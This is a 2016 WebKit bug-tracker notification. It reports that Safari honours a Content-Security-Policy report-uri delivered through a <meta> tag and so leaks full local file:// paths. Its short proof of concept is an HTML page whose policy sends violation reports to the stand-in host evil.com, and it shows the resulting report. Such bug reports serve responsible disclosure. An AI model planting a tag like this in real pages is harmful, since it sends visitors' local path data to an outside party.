[Webkit-unassigned] [Bug 158263] New: CSP: report-uri is honored even if CSP is served via <meta> tag, leaking full file:// paths as document-uri
bugzilla-daemon at webkit.org
bugzilla-daemon at webkit.org
Wed Jun 1 09:03:39 PDT 2016
https://bugs.webkit.org/show_bug.cgi?id=158263
Bug ID: 158263
Summary: CSP: report-uri is honored even if CSP is served via
<meta> tag, leaking full file:// paths as document-uri
Classification: Unclassified
Product: WebKit
Version: WebKit Local Build
Hardware: Unspecified
OS: OS X 10.11
Status: NEW
Severity: Normal
Priority: P2
Component: WebCore Misc.
Assignee: webkit-unassigned at lists.webkit.org
Reporter: mikispag at gmail.com
Safari leaks the full file:// path in document-uri if a report-uri is in a CSP served via <meta> tag, even if the specification explicitly prohibits to honor report-uri if the policy is served via <meta> tag[1].
PoC:
report-uri.html
----------------
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Security-Policy" content="img-src 'none'; report-uri https://evil.com/csp">
<title>CSP report-uri demo</title>
</head>
<body>
<img src="cat.jpg" alt="A nice cat">
</body>
</html>
This is the report sent to a remote report-uri:
{"csp-report":{"document-uri":"file:///Users/mikispag/CSP/report-uri.html","referrer":"","violated-directive":"img-src 'none'","original-policy":"img-src 'none'; report-uri https://evil.com/csp","blocked-uri":"file"}}
[1] https://www.w3.org/TR/CSP2/#directive-report-uri
--
You are receiving this mail because:
You are the assignee for the bug.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.webkit.org/pipermail/webkit-unassigned/attachments/20160601/407ab190/attachment-0001.html>
More information about the webkit-unassigned
mailing list